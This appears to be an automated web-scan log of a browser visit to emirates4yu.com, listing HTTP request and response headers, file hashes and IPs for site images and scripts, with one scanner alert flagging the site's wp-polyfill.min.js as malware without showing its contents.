File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 8473bf0d64cf01b0d73de1e3a56cb2e1
d9a6e27c51516f8ab2ddfff90b4bda469c808c20
7b4634dc12114ad41ccbde357c30d4d41f1ca16757bd5e45866a8514fc9492fd
GET /wp-content/uploads/2017/11/bottom-12.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8560
last-modified: Tue, 21 Nov 2017 10:36:46 GMT
etag: "5a1401be-2170"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-13.jpg
35.190.203.220200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-13.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 8c291cbe6490881cc3c0755cf9a2539a
599192c130410d6459b6fa8817d97becc1eb5126
c7e33b9b92373aeb53a9a99f94577e67449d8fe06d308143546c0d1ccf1a2adb
GET /wp-content/uploads/2017/11/bottom-13.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11013
last-modified: Tue, 21 Nov 2017 10:36:49 GMT
etag: "5a1401c1-2b05"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-14.jpg
35.190.203.220200 OK 8.4 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-14.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 1b512c63aefd76046daf3b4c085e309e
ef2f61ac159a93c756051fc086517b0fcee5250d
42f98a554f182b02bd320a323567a3c0836d47986a021e270974e5cc86e847be
GET /wp-content/uploads/2017/11/bottom-14.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8434
last-modified: Tue, 21 Nov 2017 10:36:51 GMT
etag: "5a1401c3-20f2"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-1.jpg
35.190.203.220200 OK 5.9 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-1.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash dc651fa5f898b866c5e85c14ad47c662
25e051e8d4f74fd64d462558720aeee32069a7b1
05143b2664e98a00ab6c055a93a450aed1775a0f7c0603d2d426737adb98e03b
GET /wp-content/uploads/2017/11/top-logo-1.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 5866
last-modified: Tue, 21 Nov 2017 10:36:52 GMT
etag: "5a1401c4-16ea"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/top-logo-2.jpg
35.190.203.220200 OK 6.0 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/top-logo-2.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash a087413233d0ad374ca46a033ad59c5a
2ac1d2ab1738b843908b59dc532266e66847541e
02a0d1c77182ce4e212d4b492781e87dc2f809201b4ba899fcbd3e5b15c7d933
GET /wp-content/uploads/2017/11/top-logo-2.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 5959
last-modified: Tue, 21 Nov 2017 10:36:54 GMT
etag: "5a1401c6-1747"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-2.jpg
35.190.203.220200 OK 9.1 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-2.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash de08c6e5310907878d711da01c1eab43
e9f9a74aed8de5bd183e2d5e243a741700a0c49e
a583c34d1fbdb883bcb7365a10ba2df937b0cf2440dfc0b3776d0e25361d3865
GET /wp-content/uploads/2017/11/bottom-2.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9055
last-modified: Tue, 21 Nov 2017 10:36:23 GMT
etag: "5a1401a7-235f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-3.jpg
35.190.203.220200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-3.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 78efe6e21e35242ebb9407aed929cfa6
5ad8960ed5419d62bc0e536b8cbab2f8881dd83e
9999107093e99f633df47ff32121411af7d0ed6f03bccd638eabb321bafa1d50
GET /wp-content/uploads/2017/11/bottom-3.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14019
last-modified: Tue, 21 Nov 2017 10:36:25 GMT
etag: "5a1401a9-36c3"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-5.jpg
35.190.203.220200 OK 21 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-5.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 9a7666b01a98a94da991e5a9fd110f88
0e5bc46fe206dc7fc9f32c980733e90fe9042bec
29560a242bc1195e7efc8b39b42a7ecdec3dc2ab04764f8c9ae398420f22afb1
GET /wp-content/uploads/2017/11/bottom-5.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 20676
last-modified: Tue, 21 Nov 2017 10:36:30 GMT
etag: "5a1401ae-50c4"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-11.jpg
35.190.203.220200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-11.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 392bd7dc45b2bc71686745067df3d386
d8188d8d77bd6ad7bfbb8417e1cddedd5954edc4
27413c02c7178c86dc51788315b64261c38737e92286969d4eccf5148c0ff34f
GET /wp-content/uploads/2017/11/bottom-11.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11424
last-modified: Tue, 21 Nov 2017 10:36:45 GMT
etag: "5a1401bd-2ca0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-10.jpg
35.190.203.220200 OK 9.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-10.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 82b4f6ac1cd8502f3b319a9b27198bac
d1f35f28eea0114b99352965cd3a9fb039d6c417
3f091eeab05a05d4dd0a0d3b9328f15b54dfcb5f38427a54a13848e7246d8a49
GET /wp-content/uploads/2017/11/bottom-10.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 9613
last-modified: Tue, 21 Nov 2017 10:36:42 GMT
etag: "5a1401ba-258d"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-9.jpg
35.190.203.220200 OK 21 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-9.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash f0bd97c3d1c1b134d05d8cc259f91e51
d9efa847b70fda7ab72afb09b57cb214e1abfbba
00765cf99f6fdbb68fb814f50854a01c3e861764d70e1e10199dac15aae31b01
GET /wp-content/uploads/2017/11/bottom-9.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 20902
last-modified: Tue, 21 Nov 2017 10:36:40 GMT
etag: "5a1401b8-51a6"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-8.jpg
35.190.203.220200 OK 8.2 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-8.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash fcca53149109219df56e2b7feb95572e
46004fa462ddc3717e1ddfce362c14feb3bdee28
e8b14877872b155635ef1c38e76a3294ca4e3dbe43a7aa84d823ddafa7c1f7c7
GET /wp-content/uploads/2017/11/bottom-8.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 8204
last-modified: Tue, 21 Nov 2017 10:36:38 GMT
etag: "5a1401b6-200c"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-7.jpg
35.190.203.220200 OK 17 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-7.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 83a4ba694e87c3ba155a489035e4957e
e7e2819ba6f1b0a3914e9cd338252ae1a153d079
b53d7f0b37e9f472650aac139b1f043671d8b0b55a576a8d3c3bf9619a2ac2cc
GET /wp-content/uploads/2017/11/bottom-7.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 16646
last-modified: Tue, 21 Nov 2017 10:36:35 GMT
etag: "5a1401b3-4106"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-6.jpg
35.190.203.220200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-6.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 4eab79dda963361bb3e424ad4f9df5f8
e9bf4524ea9b30139cbb90cdb573c1459f0e2266
3f72d982f5a589f5306b16bf9ce0354622829a0f9bd1dc21065a0def99219a00
GET /wp-content/uploads/2017/11/bottom-6.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14538
last-modified: Tue, 21 Nov 2017 10:36:33 GMT
etag: "5a1401b1-38ca"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-4.jpg
35.190.203.220200 OK 14 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-4.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 5d8587e375b6360a6be61374f6c2d530
96dba5e48405edf91a297c0923dda3afd8fb2caa
abc13b34dcf0553f88007a2d7a6a8adda9671a399276fb3d8e6949c01c52e363
GET /wp-content/uploads/2017/11/bottom-4.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 14481
last-modified: Tue, 21 Nov 2017 10:36:28 GMT
etag: "5a1401ac-3891"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2017/11/bottom-1.jpg
35.190.203.220200 OK 11 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2017/11/bottom-1.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 145x145, components 3\012- data
Hash 927ad9308a7d419df51418148ef4bb89
2a3fabc325a0c63c7035bd97fc9a8e067c0be820
fc394ce0a46039d708c5e115e0cbe16a38fc8bdf0fb6aad5a9cf2fd4301817b6
GET /wp-content/uploads/2017/11/bottom-1.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 11002
last-modified: Tue, 21 Nov 2017 10:36:21 GMT
etag: "5a1401a5-2afa"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
www.google.com/recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0
142.250.74.164200 OK 582 B URL HTTP/2 www.google.com/recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0
IP 142.250.74.164:0
File type ASCII text, with very long lines (884), with no line terminators
Hash 3eec2b12b9c8525fb2279fe84a006cfc
10f9f17053dc87a6eff4921a44464822c40ec338
40bbc61668f6c5132ce35b47d149c21289ace6094095c225e7a742a773d29c53
GET /recaptcha/api.js?render=6Lcip7kiAAAAAGiDeIhi-M9hvI_IYub_hwhsk4OT&ver=3.0 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
expires: Fri, 25 Nov 2022 12:02:00 GMT
date: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=300
content-type: text/javascript; charset=UTF-8
cross-origin-resource-policy: cross-origin
content-encoding: gzip
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
content-length: 582
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash b44543de9922ec7d97f2e0be1865553e
caef856450efd75de0cfae9402903b1f4bd6de4c
d251377b4bc11c32a847ce4dc5dfda92e56031617f5b3eeea54fdcd0945b3eb7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash df06e70fc8a35facf1d8db463d18e231
fa8a2975566cc792898f870e48ae7518d3657326
4cef7e704f4d575ce6733f6f2d803d241b597be51ff3fb03f72e5c33a893b504
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 2594
Cache-Control: max-age=164885
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Etag: "638085ab-1d7"
Expires: Sun, 27 Nov 2022 09:50:05 GMT
Last-Modified: Fri, 25 Nov 2022 09:06:51 GMT
Server: ECS (ska/F70F)
X-Cache: HIT
Content-Length: 471
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 65992aeb8efb9a0b8fd59687090733fe
526a2afccc93d32849185d153fafe44b72797df9
b6677984b6c3602d7b62df776158c09a3e57eec4c0edbddafb0624200715f10e
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Cache-Control, ETag, Pragma, Expires, Backoff, Last-Modified
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 25 Nov 2022 11:08:53 GMT
cache-control: public,max-age=3600
age: 3187
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash a0111a2443450172e5d2b48d350a8f57
75e89d4cd001303e66a93880f96d6c47e7d665ab
c9865c82b8f373aeb3a7333b0f65408211d832aba753c35d3544ecb2913f4f64
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
35.190.203.220200 OK 7.7 kB URL HTTP/2 emirates4yu.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
IP 35.190.203.220:0
File type Unicode text, UTF-8 text, with very long lines (19138), with no line terminators
Hash fb897ad0e80dcb3d52d0c0674c3012b5
bc1c220d1d32b338e22ae10528becd0579049f58
0c3475b70c1b5a2aa3dd645fd32d7ba69d5d1e2f8c8e1cbe707fc8513902578f
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 11 Apr 2022 12:04:30 GMT
etag: W/"6254194e-4ac6"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
